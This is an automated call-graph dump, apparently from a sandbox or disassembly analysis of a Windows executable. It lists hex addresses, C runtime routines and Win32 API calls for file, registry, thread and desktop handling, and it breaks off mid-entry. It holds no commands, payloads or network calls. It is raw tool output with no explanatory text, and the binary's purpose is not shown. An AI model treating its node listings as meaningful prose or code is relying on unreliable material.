95089 1113e8f0 std::locale::_Init 258 API calls 95088->95089 95089->95079 95090->95091 95094 11141304 95090->95094 95093 11141352 std::locale::_Init 95091->95093 95113 1102a250 95093->95113 95135 110290f0 261 API calls 2 library calls 95094->95135 95101 11080bf3 _strrchr 95100->95101 95102 11080c0a std::locale::_Init 95101->95102 95402 11080a30 IsDBCSLeadByte 95101->95402 95102->95045 95105 1110c4ae 95104->95105 95106 1110c4b7 95105->95106 95107 1110c4ce _memset 95105->95107 95111 110290f0 261 API calls 2 library calls 95106->95111 95107->95063 95112->95073 95136 11028290 95113->95136 95115 1102a25e 95116 11140ce0 95115->95116 95117 11140d6a 95116->95117 95118 11140ceb 95116->95118 95117->95088 95118->95117 95118->95118 95119 11140cfb GetFileAttributesA 95118->95119 95120 11140d15 95119->95120 95121 11140d07 95119->95121 95375 11161dd7 95120->95375 95121->95088 95124 11080be0 std::locale::_Init IsDBCSLeadByte 95125 11140d26 95124->95125 95126 11140d43 95125->95126 95127 11140ce0 std::locale::_Init 35 API calls 95125->95127 95126->95088 95128 11140d36 95127->95128 95129 11140d4c 95128->95129 95130 11140d3e 95128->95130 95131 1115f3b5 _free 23 API calls 95129->95131 95132 1115f3b5 _free 23 API calls 95130->95132 95133 11140d51 CreateDirectoryA 95131->95133 95132->95126 95133->95126 95137 110282b3 95136->95137 95139 110288fb 95136->95139 95138 11028370 GetModuleFileNameA 95137->95138 95148 110282e8 95137->95148 95142 11028391 _strrchr 95138->95142 95140 11028997 95139->95140 95141 110289aa 95139->95141 95143 1115e4d1 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 95140->95143 95144 1115e4d1 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 95141->95144 95147 1116076b std::locale::_Init 139 API calls 95142->95147 95145 110289a6 95143->95145 95146 110289bb 95144->95146 95145->95115 95146->95115 95152 1102836b 95147->95152 95150 1116076b std::locale::_Init 139 API calls 95148->95150 95150->95152 95151 110283e4 95159 11028865 95151->95159 95164 1115f5b7 95151->95164 95152->95139 95163 11026500 49 API calls 2 library calls 95152->95163 95155 110283f5 std::locale::_Init 95155->95159 95168 11026500 49 API calls 2 library calls 95155->95168 95157 11028430 std::locale::_Init 95157->95159 95169 11026500 49 API calls 2 library calls 95157->95169 95159->95159 95171 11160535 95159->95171 95161 11160e4e 81 API calls _LanguageEnumProc@4 95162 11028453 std::locale::_Init 95161->95162 95162->95159 95162->95161 95170 11026500 49 API calls 2 library calls 95162->95170 95163->95151 95165 1115f5a1 95164->95165 95184 1115fe1b 95165->95184 95168->95157 95169->95162 95170->95162 95172 11160541 ___lock_fhandle 95171->95172 95173 11160553 95172->95173 95174 11160568 95172->95174 95269 11165abf 23 API calls __getptd_noexit 95173->95269 95181 11160563 ___lock_fhandle 95174->95181 95249 11167769 95174->95249 95177 11160558 95270 1116a6d4 11 API calls __write_nolock 95177->95270 95178 11160581 95253 111604c8 95178->95253 95181->95139 95185 1115fe34 95184->95185 95188 1115fbf0 95185->95188 95200 1115fb69 95188->95200 95190 1115fc14 95208 11165abf 23 API calls __getptd_noexit 95190->95208 95193 1115fc19 95209 1116a6d4 11 API calls __write_nolock 95193->95209 95196 1115fc4a 95197 1115fc91 95196->95197 95210 1116d3d5 75 API calls 3 library calls 95196->95210 95199 1115f5b2 95197->95199 95211 11165abf 23 API calls __getptd_noexit 95197->95211 95199->95155 95201 1115fb7c 95200->95201 95207 1115fbc9 95200->95207 95212 11167f85 95201->95212 95204 1115fba9 95204->95207 95230 1116cf14 64 API calls 5 library calls 95204->95230 95207->95190 95207->95196 95208->95193 95209->95199 95210->95196 95211->95199 95231 11167f0c GetLastError 95212->95231 95214 11167f8d 95215 1115fb81 95214->95215 95245 11169f7a 62 API calls 3 library calls 95214->95245 95215->95204 95217 1116cc78 95215->95217 95218 1116cc84 ___lock_fhandle 95217->95218 95219 11167f85 __getptd 62 API calls 95218->95219 95220 1116cc89 95219->95220 95221 1116ccb7 95220->95221 95222 1116cc9b 95220->95222 95247 1116cc2b 31 API calls 3 library calls 95221->95247 95223 11167f85 __getptd 62 API calls 95222->95223 95225 1116cca0 95223->95225 95228 1116ccae ___lock_fhandle 95225->95228 95246 11169f7a 62 API calls 3 library calls 95225->95246 95226 1116ccd2 95248 1116cce5 LeaveCriticalSection _doexit 95226->95248 95228->95204 95230->95207 95232 11167dca ___set_flsgetvalue TlsGetValue DecodePointer TlsSetValue 95231->95232 95233 11167f23 95232->95233 95234 11167f79 SetLastError 95233->95234 95235 1116658e __calloc_crt 19 API calls 95233->95235 95234->95214 95236 11167f37 95235->95236 95236->95234 95237 11167f3f DecodePointer 95236->95237 95238 11167f54 95237->95238 95239 11167f70 95238->95239 95240 11167f58 95238->95240 95241 1115f3b5 _free 19 API calls 95239->95241 95242 11167e58 __initptd 11 API calls 95240->95242 95243 11167f76 95241->95243 95244 11167f60 GetCurrentThreadId 95242->95244 95243->95234 95244->95234 95247->95226 95248->95225 95250 1116779d EnterCriticalSection 95249->95250 95251 1116777b 95249->95251 95252 11167783 95250->95252 95251->95250 95251->95252 95252->95178 95254 111604ed 95253->95254 95255 111604d9 95253->95255 95257 111604e9 95254->95257 95272 11167847 95254->95272 95312 11165abf 23 API calls __getptd_noexit 95255->95312 95271 111605a1 LeaveCriticalSection LeaveCriticalSection __ftelli64 95257->95271 95258 111604de 95313 1116a6d4 11 API calls __write_nolock 95258->95313 95265 11160507 95289 1116d7d4 95265->95289 95267 1116050d 95267->95257 95314 1115f3b5 95267->95314 95269->95177 95270->95181 95271->95181 95273 11167860 95272->95273 95277 111604f9 95272->95277 95274 11165a57 __fclose_nolock 34 API calls 95273->95274 95273->95277 95275 1116787b 95274->95275 95320 1116ea14 93 API calls 5 library calls 95275->95320 95278 1116d898 95277->95278 95279 11160501 95278->95279 95280 1116d8a8 95278->95280 95282 11165a57 95279->95282 95280->95279 95281 1115f3b5 _free 23 API calls 95280->95281 95281->95279 95283 11165a63 95282->95283 95284 11165a78 95282->95284 95321 11165abf 23 API calls __getptd_noexit 95283->95321 95284->95265 95286 11165a68 95322 1116a6d4 11 API calls __write_nolock 95286->95322 95288 11165a73 95288->95265 95290 1116d7e0 ___lock_fhandle 95289->95290 95291 1116d803 95290->95291 95292 1116d7e8 95290->95292 95294 1116d80f 95291->95294 95298 1116d849 95291->95298 95346 11165ad2 23 API calls __getptd_noexit 95292->95346 95348 11165ad2 23 API calls __getptd_noexit 95294->95348 95296 1116d7ed 95347 11165abf 23 API calls __getptd_noexit 95296->95347 95297 1116d814 95349 11165abf 23 API calls __getptd_noexit 95297->95349 95323 111731d2 95298->95323 95302 1116d81c 95350 1116a6d4 11 API calls __write_nolock 95302->95350 95303 1116d84f 95305 1116d85d 95303->95305 95306 1116d869 95303->95306 95311 1116d7f5 ___lock_fhandle 95311->95267 95312->95258 95313->95257 95315 1115f3c0 HeapFree 95314->95315 95316 1115f3e9 __dosmaperr 95314->95316 95315->95316 95316->95257 95320->95277 95321->95286 95322->95288 95325 111731de ___lock_fhandle 95323->95325 95324 11173238 95326 1117323d EnterCriticalSection 95324->95326 95328 1117325a ___lock_fhandle 95324->95328 95325->95324 95327 11173213 InitializeCriticalSectionAndSpinCount 95325->95327 95329 11173226 95325->95329 95326->95328 95327->95329 95328->95303 95353 11173268 LeaveCriticalSection _doexit 95329->95353 95346->95296 95347->95311 95348->95297 95349->95302 95350->95311 95353->95324 95376 11161de8 _strlen 95375->95376 95377 11140d1c 95375->95377 95376->95377 95381 1116866f 95376->95381 95377->95124 95382 11168684 95381->95382 95383 1116867d 95381->95383 95393 11165abf 23 API calls __getptd_noexit 95382->95393 95383->95382 95386 111686a2 95383->95386 95387 11161e0d 95386->95387 95395 11165abf 23 API calls __getptd_noexit 95386->95395 95387->95377 95390 1116a682 95387->95390 95389 11168689 95394 1116a6d4 11 API calls __write_nolock 95389->95394 95396 1116a559 95390->95396 95393->95389 95394->95387 95395->95389 95397 1116a578 _memset __call_reportfault 95396->95397 95398 1116a596 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 95397->95398 95399 1116a664 __call_reportfault 95398->95399 95400 1115e4d1 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 95399->95400 95401 1116a680 GetCurrentProcess TerminateProcess 95400->95401 95401->95377 95402->95102 95404 111606bb ___lock_fhandle 95403->95404 95405 111606ce 95404->95405 95407 111606fb 95404->95407 95456 11165abf 23 API calls __getptd_noexit 95405->95456 95422 1116dec8 95407->95422 95408 111606d3 95457 1116a6d4 11 API calls __write_nolock 95408->95457 95411 11160700 95412 11160707 95411->95412 95413 11160714 95411->95413 95458 11165abf 23 API calls __getptd_noexit 95412->95458 95415 1116073b 95413->95415 95416 1116071b 95413->95416 95434 1116dc31 95415->95434 95459 11165abf 23 API calls __getptd_noexit 95416->95459 95417 111606de ___lock_fhandle @_EH4_CallFilterFunc@8 95417->95058 95432 1116ded4 ___lock_fhandle 95422->95432 95423 1116df57 95461 1116dff2 95423->95461 95424 1116df5e 95424->95423 95427 1116df73 InitializeCriticalSectionAndSpinCount 95424->95427 95426 1116dfe7 ___lock_fhandle 95426->95411 95428 1116dfa6 EnterCriticalSection 95427->95428 95429 1116df93 95427->95429 95428->95423 95431 1115f3b5 _free 23 API calls 95429->95431 95431->95423 95432->95423 95432->95424 95464 111677aa EnterCriticalSection 95432->95464 95465 11167818 LeaveCriticalSection LeaveCriticalSection _doexit 95432->95465 95435 1116dc53 95434->95435 95436 1116dc67 95435->95436 95448 1116dc7e 95435->95448 95470 11165abf 23 API calls __getptd_noexit 95436->95470 95438 1116de1b 95441 1116de81 95438->95441 95442 1116de6f 95438->95442 95439 1116dc6c 95471 1116a6d4 11 API calls __write_nolock 95439->95471 95467 11175ed3 95441->95467 95476 11165abf 23 API calls __getptd_noexit 95442->95476 95445 1116de74 95477 1116a6d4 11 API calls __write_nolock 95445->95477 95446 11160746 95460 11160761 LeaveCriticalSection LeaveCriticalSection __ftelli64 95446->95460 95448->95438 95448->95442 95472 1117625d 72 API calls __fassign 95448->95472 95450 1116ddea 95450->95442 95473 111760f7 81 API calls __mbsnbicmp_l 95450->95473 95452 1116de14 95452->95438 95474 111760f7 81 API calls __mbsnbicmp_l 95452->95474 95454 1116de33 95454->95438 95475 111760f7 81 API calls __mbsnbicmp_l 95454->95475 95456->95408 95457->95417 95458->95417 95459->95417 95460->95417 95466 1116fe36 LeaveCriticalSection 95461->95466 95463 1116dff9 95463->95426 95464->95432 95465->95432 95466->95463 95478 11175e0f 95467->95478 95469 11175eee 95469->95446 95470->95439 95471->95446 95472->95450 95473->95452 95474->95454 95475->95438 95476->95445 95477->95446 95480 11175e1b ___lock_fhandle 95478->95480 95479 11175e2e 95598 11165abf 23 API calls __getptd_noexit 95479->95598 95480->95479 95482 11175e64 95480->95482 95489 111756db 95482->95489 95483 11175e33 95599 1116a6d4 11 API calls __write_nolock 95483->95599 95486 11175e7e 95600 11175ea5 LeaveCriticalSection __unlock_fhandle 95486->95600 95487 11175e3d ___lock_fhandle 95487->95469 95490 11175702 95489->95490 95601 11178c85 95490->95601 95492 1116a682 __invoke_watson 10 API calls 95495 11175e0e ___lock_fhandle 95492->95495 95493 1117575d 95621 11165ad2 23 API calls __getptd_noexit 95493->95621 95496 11175e2e 95495->95496 95503 11175e64 95495->95503 95716 11165abf 23 API calls __getptd_noexit 95496->95716 95497 1117571e 95497->95493 95500 111757b8 95497->95500 95543 1117598d 95497->95543 95498 11175762 95622 11165abf 23 API calls __getptd_noexit 95498->95622 95508 1117583f 95500->95508 95511 11175812 95500->95511 95502 1117576c 95623 1116a6d4 11 API calls __write_nolock 95502->95623 95506 111756db __tsopen_nolock 116 API calls 95503->95506 95504 11175e33 95717 1116a6d4 11 API calls __write_nolock 95504->95717 95510 11175e7e 95506->95510 95624 11165ad2 23 API calls __getptd_noexit 95508->95624 95718 11175ea5 LeaveCriticalSection __unlock_fhandle 95510->95718 95608 11173298 95511->95608 95512 11175844 95625 11165abf 23 API calls __getptd_noexit 95512->95625 95515 11175e3d ___lock_fhandle 95515->95486 95516 1117584e 95626 1116a6d4 11 API calls __write_nolock 95516->95626 95519 11175776 95519->95486 95520 111758d0 95521 111758fa CreateFileA 95520->95521 95522 111758d9 95520->95522 95523 11175997 GetFileType 95521->95523 95524 11175927 95521->95524 95627 11165ad2 23 API calls __getptd_noexit 95522->95627 95527 111759a4 GetLastError 95523->95527 95528 111759e8 95523->95528 95526 11175960 GetLastError 95524->95526 95530 1117593b CreateFileA 95524->95530 95630 11165ae5 23 API calls 3 library calls 95526->95630 95632 11165ae5 23 API calls 3 library calls 95527->95632 95634 11173062 24 API calls 2 library calls 95528->95634 95529 111758de 95628 11165abf 23 API calls __getptd_noexit 95529->95628 95530->95523 95530->95526 95534 11175987 95631 11165abf 23 API calls __getptd_noexit 95534->95631 95535 111759cd CloseHandle 95535->95534 95538 111759db 95535->95538 95536 111758e8 95629 11165abf 23 API calls __getptd_noexit 95536->95629 95633 11165abf 23 API calls __getptd_noexit 95538->95633 95540 11175a06 95545 11175c1c 95540->95545 95546 11175a5c 95540->95546 95548 11175acb 95540->95548 95543->95492 95544 111759e0 95544->95534 95545->95543 95549 11175d84 CloseHandle CreateFileA 95545->95549 95635 111710b6 36 API calls 3 library calls 95546->95635 95548->95545 95561 11175c25 95548->95561 95569 11175b75 95548->95569 95551 11175ddf 95549->95551 95552 11175db1 GetLastError 95549->95552 95550 11175a66 95553 11175a6f 95550->95553 95554 11175a88 95550->95554 95551->95543 95714 11165ae5 23 API calls 3 library calls 95552->95714 95636 11165ad2 23 API calls __getptd_noexit 95553->95636 95637 11170a09 95554->95637 95559 11175dbd 95715 111730e3 24 API calls 2 library calls 95559->95715 95560 11175a74 95560->95548 95565 11175a7c 95560->95565 95561->95545 95571 11175c42 95561->95571 95573 11175b99 95561->95573 95562 11175bed 95568 11170a09 __read_nolock 44 API calls 95562->95568 95566 1116d738 __close_nolock 37 API calls 95565->95566 95566->95534 95579 11175bfa 95568->95579 95569->95545 95569->95562 95569->95573 95574 11175bc4 95569->95574 95708 11171df9 36 API calls 3 library calls 95571->95708 95573->95545 95573->95565 95713 1116ea14 93 API calls 5 library calls 95573->95713 95706 11171df9 36 API calls 3 library calls 95574->95706 95575 11175c4d 95575->95573 95582 11175c58 95575->95582 95577 11175c83 95583 1116d738 __close_nolock 37 API calls 95577->95583 95578 11175c9d 95580 11175cbf 95578->95580 95584 11175ca4 95578->95584 95579->95545 95579->95565 95579->95577 95579->95578 95579->95580 95712 111710b6 36 API calls 3 library calls 95580->95712 95709 11171df9 36 API calls 3 library calls 95582->95709 95585 11175bcf 95585->95573 95590 11175bd6 95585->95590 95707 11171df9 36 API calls 3 library calls 95590->95707 95598->95483 95599->95487 95600->95487 95602 11178ca6 95601->95602 95603 11178c91 95601->95603 95602->95497 95719 11165abf 23 API calls __getptd_noexit 95603->95719 95605 11178c96 95720 1116a6d4 11 API calls __write_nolock 95605->95720 95607 11178ca1 95607->95497 95618 111732a4 ___lock_fhandle 95608->95618 95609 111732b9 ___lock_fhandle 95609->95520 95610 1117340a 95728 11173428 LeaveCriticalSection _doexit 95610->95728 95612 111733a0 95722 1116658e 95612->95722 95614 11173348 EnterCriticalSection 95615 11173358 LeaveCriticalSection 95614->95615 95614->95618 95615->95618 95617 1117331e InitializeCriticalSectionAndSpinCount 95617->95618 95618->95609 95618->95610 95618->95612 95618->95614 95618->95617 95721 1117336a LeaveCriticalSection _doexit 95618->95721 95619 111731d2 ___lock_fhandle 3 API calls 95619->95610 95621->95498 95622->95502 95623->95519 95624->95512 95625->95516 95626->95519 95627->95529 95628->95536 95629->95519 95630->95534 95631->95543 95632->95535 95633->95544 95634->95540 95635->95550 95636->95560 95638 11170a25 95637->95638 95639 11170a40 95637->95639 95740 11165ad2 23 API calls __getptd_noexit 95638->95740 95641 11170a4f 95639->95641 95643 11170a6e 95639->95643 95706->95585 95708->95575 95713->95573 95714->95559 95715->95551 95716->95504 95717->95515 95718->95515 95719->95605 95720->95607 95721->95618 95725 11166597 95722->95725 95724 111665d4 95724->95610 95724->95619 95725->95724 95726 111665b5 Sleep 95725->95726 95729 1116c936 95725->95729 95727 111665ca 95726->95727 95727->95724 95727->95725 95728->95609 95730 1116c942 95729->95730 95734 1116c95d 95729->95734 95731 1116c94e 95730->95731 95730->95734 95738 11165abf 23 API calls __getptd_noexit 95731->95738 95732 1116c970 RtlAllocateHeap 95732->95734 95737 1116c997 95732->95737 95734->95732 95734->95737 95739 11169c78 DecodePointer 95734->95739 95735 1116c953 95735->95725 95737->95725 95738->95735 95739->95734 95760 11030444 GetModuleHandleA GetProcAddress 95761 11030461 GetNativeSystemInfo 95760->95761 95763 1103046d 95760->95763 95761->95763 95762 1103040d 95776 11030430 GetStockObject GetObjectA 95762->95776 95828 1110c420 95762->95828 95763->95762 95767 110304d1 95763->95767 95770 1110c420 std::locale::_Init 261 API calls 95767->95770 95769 11030696 SetErrorMode SetErrorMode 95773 1110c420 std::locale::_Init 261 API calls 95769->95773 95771 110304d8 95770->95771 95971 110f8130 268 API calls std::locale::_Init 95771->95971 95774 110306d2 95773->95774 95879 11027fe0 95774->95879 95776->95769 95778 110306ec 95779 1110c420 std::locale::_Init 261 API calls 95778->95779 95780 11030712 95779->95780 95781 11027fe0 264 API calls 95780->95781 95782 1103072b InterlockedExchange 95781->95782 95784 1110c420 std::locale::_Init 261 API calls 95782->95784 95785 11030753 95784->95785 95882 11089840 95785->95882 95787 1103076b GetACP 95893 1115f8a3 95787->95893 95792 1103079c 95934 1113f220 95792->95934 95794 110307c8 95795 1110c420 std::locale::_Init 261 API calls 95794->95795 95796 110307e8 95795->95796 95941 11060520 95796->95941 95829 1110c43e 95828->95829 95830 1110c473 _memset 95829->95830 95831 1110c447 wsprintfA 95829->95831 95834 1115e4d1 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 95830->95834 95987 110290f0 261 API calls 2 library calls 95831->95987 95835 11030414 95834->95835 95836 11105d40 95835->95836 95837 1110c420 std::locale::_Init 261 API calls 95836->95837 95838 11105da1 95837->95838 95839 11105db9 OpenEventA 95838->95839 95988 111042a0 95838->95988 95842 11105ee1 GetStockObject GetObjectA InitializeCriticalSection InitializeCriticalSection 95839->95842 95843 11105e28 CloseHandle GetSystemDirectoryA 95839->95843 95844 1110c420 std::locale::_Init 261 API calls 95842->95844 95845 11105e48 95843->95845 95846 11105f33 95844->95846 95845->95845 95847 11105e50 LoadLibraryA 95845->95847 95848 11105f4c 95846->95848 96056 110f23a0 264 API calls std::locale::_Init 95846->96056 95847->95842 95849 11105e81 95847->95849 96007 1110c2b0 95848->96007 96023 11141710 95849->96023 95853 11105e8b 95855 11105e92 GetProcAddress 95853->95855 95856 11105eaa GetProcAddress 95853->95856 95855->95856 95858 11105ed4 FreeLibrary 95856->95858 95859 11105ec6 95856->95859 95858->95842 95859->95842 95861 11106015 95862 1115e4d1 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 95861->95862 95864 1110602f 95862->95864 95863 1110c420 std::locale::_Init 261 API calls 95865 11105f83 95863->95865 95864->95776 95866 11105f94 95865->95866 95867 11105f9d 95865->95867 96057 110f23a0 264 API calls std::locale::_Init 95866->96057 95869 1110c2b0 422 API calls 95867->95869 95870 11105fb9 CloseHandle 95869->95870 95871 11141710 std::locale::_Init 86 API calls 95870->95871 95872 11105fca 95871->95872 95872->95861 95873 1110c420 std::locale::_Init 261 API calls 95872->95873 95874 11105fd8 95873->95874 95875 11105ff2 95874->95875 96058 110f23a0 264 API calls std::locale::_Init 95874->96058 95877 1110c2b0 422 API calls 95875->95877 95878 1110600e CloseHandle 95877->95878 95878->95861 95880 110879a0 264 API calls 95879->95880 95881 11027feb _memset 95880->95881 95881->95778 95883 1110c420 std::locale::_Init 261 API calls 95882->95883 95884 11089877 95883->95884 95885 11089899 InitializeCriticalSection 95884->95885 95886 1110c420 std::locale::_Init 261 API calls 95884->95886 95889 110898fa 95885->95889 95888 11089892 95886->95888 95888->95885 96467 1115e96a 34 API calls std::exception::_Copy_str 95888->96467 95889->95787 95891 110898c9 96468 1115edc1 RaiseException 95891->96468 95894 1115f8d6 95893->95894 95895 1115f8c1 95893->95895 95894->95895 95899 1115f8dd 95894->95899 96469 11165abf 23 API calls __getptd_noexit 95895->96469 95897 1115f8c6 96470 1116a6d4 11 API calls __write_nolock 95897->96470 95901 11030792 95899->95901 96471 1116b9f4 93 API calls 7 library calls 95899->96471 95902 11161c63 95901->95902 95903 11161c6f ___lock_fhandle 95902->95903 95904 11161c90 95903->95904 95905 11161c79 95903->95905 95907 11167f85 __getptd 62 API calls 95904->95907 96497 11165abf 23 API calls __getptd_noexit 95905->96497 95909 11161c95 95907->95909 95908 11161c7e 96498 1116a6d4 11 API calls __write_nolock 95908->96498 95911 1116cc78 ____lc_codepage_func 70 API calls 95909->95911 95912 11161c9f 95911->95912 95913 1116658e __calloc_crt 23 API calls 95912->95913 95915 11161cb5 95913->95915 95914 11161c89 ___lock_fhandle _setlocale 95914->95792 95915->95914 96472 111610d4 95915->96472 95922 11161dac 96503 1116ca47 8 API calls 95922->96503 95926 11161cfb __setlocale_get_all 96499 1116cc2b 31 API calls 3 library calls 95926->96499 96633 1113f130 95934->96633 95936 1113f263 95936->95794 95937 11161f66 81 API calls std::locale::_Init 95939 1113f235 95937->95939 95938 1113f130 IsDBCSLeadByte 95938->95939 95939->95936 95939->95937 95939->95938 95940 1113f26c 95939->95940 95940->95794 95942 1106055e 95941->95942 95943 1110c420 std::locale::_Init 261 API calls 95942->95943 95945 1106058b 95943->95945 95971->95776 96059 1110c520 95988->96059 95991 1110c520 3 API calls 95992 111042ec 95991->95992 95993 1110c520 3 API calls 95992->95993 95994 111042fe 95993->95994 95995 1110c520 3 API calls 95994->95995 95996 1110430f 95995->95996 95997 1110c520 3 API calls 95996->95997 95998 11104320 95997->95998 95999 1110c420 std::locale::_Init 261 API calls 95998->95999 96000 11104331 95999->96000 96001 1110441a 96000->96001 96002 1110433c LoadLibraryA LoadLibraryA 96000->96002 96066 1115e96a 34 API calls std::exception::_Copy_str 96001->96066 96002->95839 96004 11104429 96067 1115edc1 RaiseException 96004->96067 96006 1110443e 96008 1110c2d0 CreateThread 96007->96008 96009 1110c2bf CreateEventA 96007->96009 96011 1110c2f6 96008->96011 96012 1110c30d 96008->96012 96071 1110cd70 96008->96071 96085 11026ee0 96008->96085 96110 1102c030 96008->96110 96145 110ffe60 96008->96145 96009->96008 96070 110290f0 261 API calls 2 library calls 96011->96070 96014 1110c311 WaitForSingleObject CloseHandle 96012->96014 96015 11105f68 CloseHandle 96012->96015 96014->96015 96017 1109dcf0 96015->96017 96018 1109dcff GetCurrentProcess OpenProcessToken 96017->96018 96019 1109dd3d 96017->96019 96018->96019 96020 1109dd22 96018->96020 96019->95861 96019->95863 96434 1109dc20 96020->96434 96022 1109dd2b CloseHandle 96022->96019 96024 11141731 GetVersionExA 96023->96024 96032 1114190c 96023->96032 96025 11141753 96024->96025 96024->96032 96027 11141760 RegOpenKeyExA 96025->96027 96025->96032 96026 11141915 96028 1115e4d1 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 96026->96028 96030 1114178d _memset 96027->96030 96027->96032 96031 11141922 96028->96031 96029 11141974 96033 1115e4d1 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 96029->96033 96447 1113f670 RegQueryValueExA 96030->96447 96031->95853 96032->96026 96032->96029 96454 11080d00 96032->96454 96034 11141984 96033->96034 96034->95853 96038 1114195c 96038->96026 96042 1115f5b7 std::locale::_Init 75 API calls 96038->96042 96039 1113f670 std::locale::_Init RegQueryValueExA 96040 111417f9 96039->96040 96041 111418ff RegCloseKey 96040->96041 96043 1115f5b7 std::locale::_Init 75 API calls 96040->96043 96041->96032 96044 1114196d 96042->96044 96045 1114180e 96043->96045 96044->96026 96044->96029 96449 111601fd 96045->96449 96047 11141836 96050 1115f5b7 std::locale::_Init 75 API calls 96047->96050 96048 111601fd std::locale::_Init 75 API calls 96049 1114181d 96048->96049 96049->96047 96049->96048 96052 11141842 _strncpy 96050->96052 96051 111418e1 96051->96041 96052->96051 96053 1113f670 std::locale::_Init RegQueryValueExA 96052->96053 96054 111418b8 96053->96054 96055 1113f670 std::locale::_Init RegQueryValueExA 96054->96055 96055->96051 96056->95848 96057->95867 96058->95875 96060 1110c536 CreateEventA 96059->96060 96061 1110c549 96059->96061 96060->96061 96062 1110c557 96061->96062 96068 1110c260 InterlockedIncrement 96061->96068 96063 111042dc 96062->96063 96069 1110c3c0 InterlockedIncrement 96062->96069 96063->95991 96066->96004 96067->96006 96068->96062 96069->96063 96167 110b6cd0 96071->96167 96073 1110cd7e GetCurrentThreadId 96169 1110c340 96073->96169 96075 1110cdb0 WaitForSingleObject 96174 1110cba0 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection std::ios_base::_Tidy 96075->96174 96077 1110ce1a 96079 1110cd99 std::ios_base::_Tidy 96079->96075 96080 1110cdd3 96079->96080 96083 1110ce10 96079->96083 96175 1110cba0 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection std::ios_base::_Tidy 96079->96175 96081 1110cde3 PostMessageA 96080->96081 96082 1110cde8 PostThreadMessageA 96080->96082 96081->96079 96082->96079 96176 1110c370 SetEvent PulseEvent 96083->96176 96086 11026f12 96085->96086 96178 110883c0 96086->96178 96089 1110c420 std::locale::_Init 261 API calls 96090 11026f36 96089->96090 96091 11026f57 96090->96091 96183 1110d060 96090->96183 96093 1110c340 262 API calls 96091->96093 96094 11026f6f 96093->96094 96095 11026f86 WaitForMultipleObjects 96094->96095 96097 11027064 96094->96097 96101 11026fe5 PostMessageA 96094->96101 96107 1102702a GetCurrentThreadId GetThreadDesktop 96094->96107 96211 11026ec0 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection 96094->96211 96095->96094 96096 11026f9d 96095->96096 96098 11026fa6 PostMessageA 96096->96098 96099 11026fba SetEvent Sleep 96096->96099 96100 1102707e CloseHandle 96097->96100 96212 1110cc00 274 API calls 2 library calls 96097->96212 96098->96094 96098->96099 96099->96094 96213 1110c370 SetEvent PulseEvent 96100->96213 96101->96094 96104 11027093 96106 11027075 std::ios_base::_Tidy 96106->96100 96107->96094 96108 11027039 SetThreadDesktop 96107->96108 96108->96094 96109 11027044 CloseDesktop 96108->96109 96109->96094 96111 1102c062 96110->96111 96112 1110c340 262 API calls 96111->96112 96113 1102c06f WaitForSingleObject 96112->96113 96114 1102c086 96113->96114 96115 1102c29d 96113->96115 96116 1102c090 GetTickCount 96114->96116 96117 1102c286 WaitForSingleObject 96114->96117 96303 1110c370 SetEvent PulseEvent 96115->96303 96217 110cf410 96116->96217 96117->96114 96117->96115 96120 1102c2a4 CloseHandle 96304 1110c580 InterlockedDecrement SetEvent PulseEvent InterlockedDecrement CloseHandle 96120->96304 96122 1102c2b5 std::ios_base::_Tidy 96124 110cf410 264 API calls 96125 1102c0a6 96124->96125 96125->96124 96126 1102c2d4 96125->96126 96128 1102c2e8 96125->96128 96130 1102c2fc 96125->96130 96135 1102c194 GetTickCount 96125->96135 96227 110ce440 96125->96227 96239 11029230 LoadLibraryA 96125->96239 96292 110cf0a0 265 API calls 2 library calls 96125->96292 96305 110290f0 261 API calls 2 library calls 96126->96305 96306 110290f0 261 API calls 2 library calls 96128->96306 96307 110290f0 261 API calls 2 library calls 96130->96307 96133 1102c310 96308 110290f0 261 API calls 2 library calls 96133->96308 96144 1102c191 std::ios_base::_Tidy 96135->96144 96137 11142a60 std::locale::_Init 21 API calls 96137->96144 96139 110ce4f0 261 API calls 96139->96144 96140 1113e8f0 std::locale::_Init 261 API calls 96140->96144 96142 11066f60 294 API calls 96142->96144 96144->96126 96144->96128 96144->96133 96144->96135 96144->96137 96144->96139 96144->96140 96144->96142 96293 11041cc0 263 API calls 2 library calls 96144->96293 96294 110ce4f0 96144->96294 96146 110883c0 5 API calls 96145->96146 96147 110ffe6d 96146->96147 96148 110ffe79 GetCurrentThreadId GetThreadDesktop OpenDesktopA 96147->96148 96149 110ffedf GetLastError 96148->96149 96150 110ffe9f SetThreadDesktop 96148->96150 96153 11142a60 std::locale::_Init 21 API calls 96149->96153 96151 110ffeaa 96150->96151 96152 110ffec1 GetLastError 96150->96152 96154 11142a60 std::locale::_Init 21 API calls 96151->96154 96155 11142a60 std::locale::_Init 21 API calls 96152->96155 96156 110ffef1 96153->96156 96157 110ffeb5 CloseDesktop 96154->96157 96158 110ffed3 CloseDesktop 96155->96158 96406 110ffde0 96156->96406 96157->96156 96158->96156 96160 110ffefb 96161 1110c340 262 API calls 96160->96161 96162 110fff02 96161->96162 96412 110f2460 16 API calls 96162->96412 96164 110fff09 96413 1110c370 SetEvent PulseEvent 96164->96413 96166 110fff10 std::ios_base::_Tidy 96168 110b6cd8 std::locale::_Init 96167->96168 96168->96073 96170 1110c360 SetEvent 96169->96170 96171 1110c349 96169->96171 96170->96079 96177 110290f0 261 API calls 2 library calls 96171->96177 96174->96079 96175->96079 96176->96077 96179 1110c650 4 API calls 96178->96179 96180 110883d0 96179->96180 96181 11026f19 CreateEventA 96180->96181 96182 110883e2 UnhookWindowsHookEx 96180->96182 96181->96089 96182->96181 96184 1110c420 std::locale::_Init 261 API calls 96183->96184 96185 1110d091 96184->96185 96186 1110d0b3 GetCurrentThreadId InitializeCriticalSection 96185->96186 96188 1110c420 std::locale::_Init 261 API calls 96185->96188 96189 1110d120 EnterCriticalSection 96186->96189 96190 1110d113 InitializeCriticalSection 96186->96190 96191 1110d0ac 96188->96191 96192 1110d1da LeaveCriticalSection 96189->96192 96193 